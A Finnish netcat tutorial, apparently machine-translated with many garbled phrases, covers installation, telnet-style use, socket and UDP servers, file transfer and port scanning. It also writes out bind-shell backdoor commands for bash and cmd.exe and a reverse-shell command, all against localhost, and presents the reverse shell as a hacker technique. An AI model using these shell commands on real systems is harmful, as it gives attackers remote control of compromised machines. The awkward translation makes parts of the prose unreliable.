Netcat
Netcat on terminaali sovellus, joka on samankaltainen kuin telnet-ohjelma, mutta on paljon enemmän ominaisuuksia.
sen ”tehoversio” perinteisestä telnet-ohjelmasta.
Lukuun ottamatta perus telnet toiminnot se voi tehdä monia muita asioita, kuten luoda socket palvelimet kuunnella saapuvia yhteyksiä satamiin, siirtää tiedostoja terminaalin jne.
Joten se on pieni työkalu, joka on täynnä paljon ominaisuuksia., Siksi sitä kutsutaan ”Sveitsin armeijan veitsi TCP / IP”.
netcat käsin määritellään netcat kuten
Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.
Joten periaatteessa netcat on työkalu tehdä joitakin kaksisuuntainen verkkoyhteys TCP/UDP-protokollia.
teknisesti ottaen, netcat voi toimia socket palvelin tai työasema ja vuorovaikutuksessa muiden ohjelmia samanaikaisesti lähettää ja vastaanottaa tietoja verkon kautta.
tällainen määritelmä kuulostaa liian yleiseltä ja tekee vaikeaksi ymmärtää, mitä tämä työkalu tarkalleen tekee ja mihin se on hyödyllinen., Tämä voidaan ymmärtää vain käyttämällä ja pelaamalla sitä.
Ncat
Joten ensimmäinen asia tehdä, on setup netcat koneeseen. Netcat tulee eri makuja. Se on saatavilla useilta myyjiltä.
, mutta useimmilla on samanlainen toiminnallisuus. Ubuntussa on 3 pakettia nimeltään netcat-openbsd, netcat-traditional ja ncat.
suosikkiversioni on ncat. Ncat on kehittänyt nmap joukkue on paras kaikista netcats saatavilla ja mikä tärkeintä sen cross platform ja toimii hyvin windows.,
Hankkeen verkkosivut:
Asenna Ncat Windows
Windows-versio netcat voi ladata
lataa ja pura tiedostot johonkin sopiva.
Tai ladata ncat windows-versio
Asenna Ncat Ubuntu / Linux Mint / Linux
Ubuntu syntaptic paketti on netcat-openbsd-ja netcat-perinteinen paketteja. Asenna molemmat. Nmap: ssä on myös netcat-toteutus nimeltään ncat. Asenna sekin.,
Asenna Ubuntu
$ sudo apt-get install netcat-traditional netcat-openbsd nmap
käyttää netcat-openbsd toteutus käyttää ”nc” – komento.
käyttää netcat-perinteistä toteutuskäyttöä ” nc.perinteinen ” komento
nmap ncat: n käyttämiseksi käyttää ”ncat” – käskyä.
Netcat Komento Esimerkkejä
seuraavassa opetusohjelmassa aiomme käyttää niitä kaikkia eri esimerkkejä eri tavoin.
Telnet
aivan ensimmäiseksi netcatia voidaan käyttää kuten telnet-ohjelmaa. Katsotaan miten.
$ nc -v google.com 80
Nyt netcat on kytketty google.com port 80 ja sen aika lähettää joku viesti., Yritetään hakea indeksisivu. Tälle tyypille ” GET index.html HTTP / 1.1 ” ja paina Enter-näppäintä kahdesti. Muista kahdesti.
lähtö google.com on vastaanotettu ja kaikui terminaalin.
Simple socket server
avaa yksinkertaisen socket server-tyypin seuraavassa komennossa.
$ nc -l -v 1234
yllä oleva komento tarkoittaa : Netcat Kuuntele TCP-portti 1234. – V-vaihtoehto antaa verbose ulostulo paremman ymmärryksen., Nyt toinen päätelaite yrittää muodostaa yhteyden porttiin 1234 käyttäen telnet-komento seuraavasti :
$ telnet localhost 1234Trying 127.0.0.1...Connected to localhost.Escape character is '^]'.abcting tong
Kun liität me lähettää testi viesti, kuten abc ja ting tong, että netcat socket server. Netcat socket server toistaa telnet-asiakkaalta saadut tiedot.
$ nc -l -v 5555Connection from 127.0.0.1 port 5555 acceptedabcting tong
Tämä on täydellinen Chattailuun Järjestelmän. Kirjoita jotain netcat-terminaaliin ja se näkyy myös telnet-terminaalissa. Joten tätä tekniikkaa voidaan käyttää chattailuun välillä 2 koneita.,
Täydellinen KAIKU-Palvelin
Ncat-c-optio voidaan aloittaa echo server. Lähde,
Aloittaa echo server käyttäen ncat seuraavasti
$ ncat -v -l -p 5555 -c 'while true; do read i && echo $i; done'
Nyt toisesta terminaali muodostaa yhteyden käyttämällä telnet ja kirjoita jotain. Se lähetetään takaisin ”” prefiksattuna.
netcat-openbsd-versiossa ei ole-c-vaihtoehtoa. Muista aina käyttää-v vaihtoehto verbose ulostulo.
Huomautus : Netcat voidaan kehottaa tallentamaan tiedot tiedostoon sen sijaan, että se kaikuisi päätelaitteelle.,
$ nc -l -v 1234 > data.txt
Luo UDP-Palvelin
Netcat toimii udp-portit samoin. Aloittaa netcat-palvelimen udp-portit käytä -u vaihtoehto
$ nc -v -ul 7000
UDP-Asiakas
Yhdistä tähän palvelimeen käyttäen netcat toisesta terminaali
$ nc localhost -u 7000
Nyt molemmat päätelaitteet voivat keskustella toistensa kanssa.
Tiedoston siirto
koko tiedosto voidaan siirtää netcat. Tässä on nopea esimerkki.
Yksi kone – Lähetä Tiedosto
$ cat happy.txt | ncat -v -l -p 5555Ncat: Version 5.21 ( http://nmap.org/ncat )Ncat: Listening on 0.0.0.0:5555
edellä komento, kissa komento lukee ja lähdöt sisältö onnellinen.txt., Ulostulo ei kaiku päätelaitteelle, vaan se johdetaan tai syötetään NCAT: lle, joka on avannut socket Serverin portissa 5555.
koneen B – Receive –
$ ncat localhost 5555 > happy_copy.txt
edellä komento ncat yhteyden localhost port 5555 ja mitä se saa on kirjoittanut happy_copy.txt
now happy_copy.txt on kopio happysta.txt koska tiedot lähetetään port 5555 on sisältöä onnellinen.txt edellisessä komennossa.
Netcat lähettää tiedoston vain ensimmäiselle siihen kytkeytyvälle asiakkaalle. Sen jälkeen se on ohi.,
ja kun ensimmäinen asiakas sulkee yhteyden, myös netcat-palvelin sulkee yhteyden.
Porttien skannausta
Netcatia voidaan käyttää myös porttien skannaukseen. Tämä ei kuitenkaan ole netcat: n asianmukaista käyttöä, ja olisi käytettävä Nmap: n kaltaista soveltuvampaa työkalua.
– ”- n” – parametri täällä estää DNS lookup, ”-z” tekee nc ei vastaanota tietoja palvelimesta, ja ”-w 1” tekee yhteyden aikakatkaisu kun pelattu 1 sekunnin toimettomuuden jälkeen.
Kauko-Shell/Backdoor
Ncat voidaan aloittaa perus shell kauko-järjestelmä-portti ilman tarvetta ssh., Tässä on nopea esimerkki.
$ ncat -v -l -p 7777 -e /bin/bash
edellä mainitut alkaa server port 7777 ja siirtää kaikki saapuvat input bash komento, ja tulokset lähetetään takaisin. Komento käytännössä muuntaa bash-ohjelman palvelimeksi. Netcatia voidaan siis käyttää minkä tahansa prosessin muuntamiseen palvelimeksi.
Kytke tämän bash shell käyttää nc toisesta terminaali
$ nc localhost 7777
Nyt kokeilla suorittamalla tahansa komento, kuten auttaa , ls , pwd jne.
Windows
windows kone cmd.,exe (dos prompt program) – ohjelmaa käytetään samankaltaisen kuoren käynnistämiseen netcat: n avulla. Komennon syntaksi on sama.
C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exelistening on 8888 ...connect to from (UNKNOWN) 1182
Nyt toinen konsoli voi muodostaa yhteyden käyttämällä telnet-komento
Vaikka netcat vaikka voidaan setup kauko-ohjaimen kuoret, ei ole hyödyllistä saada interaktiivinen shell kauko-järjestelmä, koska useimmissa tapauksissa netcat ei olisi asennettu kauko-järjestelmä.
tehokkain tapa saada kuori on kauko kone käyttäen netcat on luoda käänteinen kuoret.,
Reverse Shells
Tämä on netcatin tehokkain ominaisuus, johon hakkerit käyttävät sitä eniten. Netcat on käytetty lähes kaikissa reverse shell tekniikoita kiinni käänteinen yhteys shell-ohjelman hakkeroitu järjestelmä.
Reverse telnet
Ensin otetaan esimerkkinä yksinkertainen reverse telnet-yhteys. Ordinate telnet-yhteydessä asiakas muodostaa yhteyden palvelimeen viestintäkanavan käynnistämiseksi.
Your system runs (# telnet server port_number) =============> Server
Nyt, käyttäen edellä tekniikkaa, voit liittää sanoa, port 80-palvelin noutaa verkkosivun., Hakkeri on kuitenkin kiinnostunut komentokuoren hankkimisesta. Sen komentokehote windows tai pääte linux. Komentokuori antaa etäjärjestelmän lopullisen hallinnan. Nyt etäpalvelimella ei ole käynnissä palvelua, johon voit muodostaa yhteyden ja saada komentokuoren.
joten kun hakkeri hakkeroi järjestelmään, hänen on saatava komentokuori. Koska se ei ole mahdollista suoraan, ratkaisu on käyttää käänteinen kuori. Käänteisessä kuoressa palvelin käynnistää yhteyden hakkerin koneeseen ja antaa komentokuoren.,
Step 1 : Hacker machine (waiting for incoming connection)Step 2 : Server ==============> Hacker machine
odottaa saapuvia yhteyksiä, paikallinen socket kuuntelija on avattu. Netcat / ncat pystyy tähän.
ensin netcat-palvelin on käynnistettävä paikalliskoneella tai hakkerin koneella.
koneen
$ ncat -v -l -p 8888Ncat: Version 6.00 ( http://nmap.org/ncat )Ncat: Listening on :::8888Ncat: Listening on 0.0.0.0:8888
edellä mainitut alkaa socket server (kuuntelija) port 8888 paikallisella koneella/hacker kone.
Nyt käänteinen shell on käynnistänyt kohde kone/hakkeroitu kone. On olemassa useita tapoja käynnistää käänteinen kuoret.,
tahansa menetelmä ei toimi, hakkeri joko on voitava suorittaa mielivaltainen komento järjestelmän tai pitäisi pystyä ladata tiedoston, joka voidaan suorittaa avaamalla selaimen (kuten php-skripti).
tässä esimerkissä emme tee kumpaakaan edellä mainituista asioista. Suoritamme netcatin palvelimella ja heitämme käänteisen komentokuoren esittelemään konseptin. Netcat on siis asennettava palvelimelle tai kohdekoneelle.,
Kone B :
$ ncat localhost 8888 -e /bin/bash
Tämä komento yhdistää laitteen porttiin 8888 ja syöttää lähtö bash tehokkaasti, jolloin kuori kone A. Nyt kone voi suorittaa minkä tahansa komennon koneeseen B.
Koneen
todellinen hakkerointi/levinneisyys testaus skenaario, se ei ole mahdollista ajaa netcat on tavoite kone. Siksi käytetään muita tekniikoita kuoren luomiseksi. Näihin kuuluvat käänteisen shell php-komentosarjojen lataaminen ja niiden suorittaminen avaamalla ne selaimessa. Tai käynnistää puskurin ylivuoto hyödyntää suorittaa käänteinen shell hyötykuorma.,
päätelmä
joten edellä mainituissa esimerkeissä näimme, miten netcatia käytetään erilaisiin verkkotoimintoihin, kuten telnet, reverse shells jne. Hakkerit käyttävät sitä lähinnä nopeiden käänteiskuorien luomiseen.
tässä opetusohjelmassa Käsittelimme joitakin netcatin perus-ja yleiskäyttötapoja. Katso Wikipedian artikkelista lisää tietoa siitä, mitä muuta netcat voi tehdä.